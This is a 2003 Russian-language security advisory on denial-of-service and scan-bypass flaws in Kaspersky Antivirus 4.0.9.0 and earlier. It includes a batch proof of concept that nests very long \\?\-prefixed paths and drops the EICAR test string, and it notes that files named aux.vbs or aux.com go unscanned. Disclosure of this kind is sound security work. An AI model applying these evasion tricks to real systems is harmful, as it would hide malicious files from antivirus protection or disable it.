Security Lab

DoS против "Антивируса Касперского"

Дата публикации:12.02.2003
Всего просмотров:3108
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Обнаружено несколько уязвимостей в "Антивирусе Касперского", которые могут использоваться для DoS атаки и обхода проверки злонамеренного кода.

1. Файловая система NTFS позволяет создавать пути почти неограниченной длины. Но Windows API не позволяет создавать пути длинее 256 байтов. Чтобы обойти это ограничение, можно использовать в пути к файлу префикс ‘\\?\’ . Это документированная особенность Windows API. Путь, длинее 256 символов приведет к зависанию KAV службы или заставит ее потреблять 100% ресурсов CPU. Возможно, уязвимость может использоваться для выполнения произвольного кода. Длинный путь может также использоваться для обхода проверки антивирусом. Пример:

@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
обратите внимание: SET A=A..A – одна строка!

2. NTFS файл с именем aux.vbs или aux.com, содержащий злонамеренный код, не будет проверен антивирусом.

Уязвимость обнаружена в Kaspersky Antivirus 4.0.9.0 и более ранних версиях

Ссылки: SECURITY.NNOV: Kaspersky Antivirus DoS